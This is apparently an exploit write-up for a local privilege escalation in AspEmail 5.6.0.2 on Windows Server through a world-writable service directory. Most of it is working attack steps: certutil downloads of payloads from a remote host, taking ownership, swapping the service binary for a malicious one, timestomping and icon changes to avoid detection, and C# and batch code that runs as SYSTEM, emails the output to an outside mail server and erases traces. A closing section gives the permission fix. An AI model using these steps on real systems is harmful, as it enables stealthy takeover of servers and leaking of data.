AspEmail version 5.6.0.2 suffers from weak permission vulnerability that allows for local privilege escalation.
####################################################################################################################
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #
# Date: 13/04/2023 #
# Exploit Author: Zer0FauLT [[email protected]] #
# Vendor Homepage: https://www.aspemail.com #
# Software Link: https://www.aspemail.com/download.html #
# Product: AspEmail #
# Version: AspEmail 5.6.0.2 and all #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #
# Tested on: Windows Server 2016 and Windows Server 2019 #
# CVE : 0DAY #
####################################################################################################################
# ==================================================================================================================
[+] C:PenTest>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
# ==================================================================================================================
* First, we will test whether the AspEmail service is active.
* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:
[+] C:PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe 4400 Persits Software EmailAgent
or
[+] C:PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe 4400 Persits Software EmailAgent
* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING".
* Now we know that AspEmail service is active.
# ==================================================================================================================
* We will need these:
[+] C:PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:Program Files (x86)Persits SoftwareAspEmailBINEmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:Program Files (x86)Persits SoftwareAspEmailBINnircmd.exe"
[+] C:PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:WindowsTempMail.exe"
[+] C:PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:WindowsTempRun.bat"
[+] C:PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:PenTestPrivescCheck.ps1"
# ==================================================================================================================
[+] C:PenTest>powershell -ep bypass -c ". .PrivescCheck.ps1; Invoke-PrivescCheck"
Name: Persits Software EmailAgent
ImagePath : "C:Program Files (x86)Persits SoftwareAspEmailBINEmail
Agent.exe" /run
User : LocalSystem
ModifiablePath : C:Program Files (x86)Persits SoftwareAspEmailBIN
IdentityReference : Everyone
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status : Unknown
UserCanStart : False
UserCanStop : False
[+] C:PenTest>del PrivescCheck.ps1
* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.
# ================================================================================================================== #
[+] C:PenTest>ICACLS "C:Program Files (x86)Persits SoftwareAspEmail"
Successfully processed 0 files; Failed processing 1 files
C:Program Files (x86)Persits SoftwareAspEmail: Access is denied.
* We do not have permission to access subdirectories.
# ==================================================================================================================
[+] C:PenTest>ICACLS "C:Program Files (x86)Persits SoftwareAspEmailBIN"
C:Program Files (x86)Persits SoftwareAspEmailBIN Everyone:(OI)(CI)(F)
DeepSecLabpsacln:(I)(OI)(CI)(N)
DeepSecLabpsaadm:(I)(OI)(CI)(N)
DeepSecLabpsaadm_users:(I)(OI)(CI)(N)
BUILTINAdministrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITYALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
NT SERVICETrustedInstaller:(I)(CI)(F)
NT AUTHORITYSYSTEM:(I)(OI)(CI)(F)
BUILTINAdministrators:(I)(OI)(CI)(IO)(F)
BUILTINUsers:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
* Unlike other directories, we have full privileges in the "BIN" directory of the service.
* This is chmod 0777 - rwxrwxrwx in linux language.
# ==================================================================================================================
[+] C:PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:Program Files (x86)Persits SoftwareAspEmailBinEmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
DeepSecLabrootcimv2:Win32_LogicalFileSecuritySetting.Path="C:Program Files (x86)Persits SoftwareAspEmailBinEmailAgent.exe"
DeepSecLabrootcimv2:Win32_SID.SID="S-1-5-32-544"
rootcimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16
[EmailAgent.exe] ===>>> Owner: BUILTINAdministrators
* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.
# ==================================================================================================================
* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.
[+] C:PenTest>whoami
DeepSecLabHacker
[+] C:PenTest>takeown /f "C:Program Files (x86)Persits SoftwareAspEmailBIN"
SUCCESS: The file (or folder): "C:Program Files (x86)Persits SoftwareAspEmailBIN" now owned by user "DeepSecLabHacker".
[+] C:PenTest>ICACLS "C:Program Files (x86)Persits SoftwareAspEmailBIN" /Grant DeepSecLabHacker:F
processed file: C:Program Files (x86)Persits SoftwareAspEmailBIN
Successfully processed 1 files; Failed processing 0 files
* Ok. All commands resulted successfully. We now have full privileges for this directory.
# ==================================================================================================================
* Now we will modify the EmailAgent file and inject a self-written malware.
* We will be careful not to damage any files while doing this so that all transactions can be easily undone.
[+] C:Program Files (x86)Persits SoftwareAspEmailBIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:Program Files (x86)Persits SoftwareAspEmailBIN>ren EmailAgentPrivESC.exe EmailAgent.exe
# ==================================================================================================================
[+] C:Program Files (x86)Persits SoftwareAspEmailBin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:Program Files (x86)Persits SoftwareAspEmailBin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
# ==================================================================================================================
* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.
[+] C:Program Files (x86)Persits SoftwareAspEmailBIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:Program Files (x86)Persits SoftwareAspEmailBIN>del nircmd.exe
* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
* I used the Resource Tuner Console tool.
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm
# ==================================================================================================================
[+] C:Program Files (x86)Persits SoftwareAspEmailBin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:Program Files (x86)Persits SoftwareAspEmailBin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
24.09.2003 09:21 12.288 EmailAgent.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
[24.09.2003 09:21] 12.288 EmailAgent.exe
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe
* And time manipulation is over. They look like they were uploaded at the same time long ago.
# ==================================================================================================================
* Now we check for my malware ownership.
[+] C:PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:Program Files (x86)Persits SoftwareAspEmailBinEmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
DeepSecLabrootcimv2:Win32_LogicalFileSecuritySetting.Path="C:Program Files (x86)Persits SoftwareAspEmailBinEmailAgent.exe"
DeepSecLabrootcimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" rootcimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28
[+] C:PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLabHacker
EmailAgent.exe Owner: DeepSecLabHacker
# =================================================================================================================#
# #
####################################################################################################################
# #[EmailAgent.cs]# #
####################################################################################################################
# #
#
* We program this malware in such a way that when the server is reboot(when the services are restarted), #
* It will be triggered and execute the codes we want, #
* And then send a printout of all this to the email address we specified. #
#
using System; #
using System.Linq; #
using System.Text; #
using System.Diagnostics; #
using System.IO; #
using System.Collections; #
#
Namespace CliToolSpace #
{ #
class _Main #
{ #
static void Main(string[] args) #
{ #
Cli commandLine = new Cli(); #
commandLine.FileToCli(@"C:WindowsTempMail.exe & C:WindowsTempRun.bat"); #
commandLine.Execute(); #
commandLine.ToFile(@"C:WindowsTemp"); #
} #
} #
} #
#
# #
####################################################################################################################
# #[Mail.cs]# #
####################################################################################################################
# #
#
using System; #
using System.Net.Mail; #
using System.Net; #
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #
var mail = new MailMessage(); #
mail.From = new MailAddress("[email protected]"); #
mail.To.Add("[email protected]"); #
mail.Subject = "Trigger Successful!"; #
mail.IsBodyHtml = true; #
string htmlBody; #
htmlBody = "<strong>This server has been rebooted.</strong>"; #
mail.Body = htmlBody; #
Attachment attachment; #
attachment = new Attachment(@"C:WindowsTempExport.txt"); #
mail.Attachments.Add(attachment); #
SmtpServer.Port = 587; #
SmtpServer.UseDefaultCredentials = false; #
SmtpServer.Credentials = new System.Net.NetworkCredential("[email protected]","p@ssw0rd123"); #
SmtpServer.EnableSsl = true; #
SmtpServer.Timeout = int.MaxValue; #
SmtpServer.Send(mail); #
#
# #
####################################################################################################################
# #[Run.bat]# #
####################################################################################################################
# #
#
whoami > C:WindowsTempExport.txt #
cd C:Program Files (x86)Persits SoftwareAspEmailBin #
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #
cd c:WindowsTasks #
del Run.bat & del Mail.exe #
#
# #
####################################################################################################################
# #
[+]Trigger Successful![+] #
#
[+] C:PenTest>systeminfo | findstr "Boot Time" #
System Boot Time: 13.04.2022, 07:46:06 #
#
# #
####################################################################################################################
#[Export.txt]# #
####################################################################################################################
# #
#
NT AUTHORITYSYSTEM #
#
# #
####################################################################################################################
# #
# ==================================================================================================================
# ...|||[FIX]|||... #
# ==================================================================================================================
# [+] C:>Runas /profile /user:DeepSecLabAdministrator CMD [+] #
# =================================================================================================================#
[+] C:Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS
SERVICE_Name: Persits Software EmailAgent
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_Name : "C:Program Files (x86)Persits SoftwareAspEmailBINEmailAgent.exe" /run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_Name : Persits Software EmailAgent
DEPENDENCIES : rpcss
SERVICE_START_Name : LocalSystem
# ==================================================================================================================
[+] C:Administrator>sc sdshow "Persits Software EmailAgent"
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
# ==================================================================================================================
[+] C:Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Persits Software EmailAgent
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITYSYSTEM
SERVICE_ALL_ACCESS
RW BUILTINAdministrators
SERVICE_ALL_ACCESS
# ==================================================================================================================
[+] C:Administrator>ICACLS "C:Program Files (x86)Persits Software" /T /Q /C /RESET
[+] C:PenTest>ICACLS "C:Program Files (x86)Persits SoftwareAspEmailBIN"
Successfully processed 0 files; Failed processing 1 files
C:Program Files (x86)Persits SoftwareAspEmailBin: Access is denied.
DONE!
# ==================================================================================================================
[+] C:Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:Administrator> Start-Service -Name "Persits Software EmailAgent"
* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.
# ==================================================================================================================
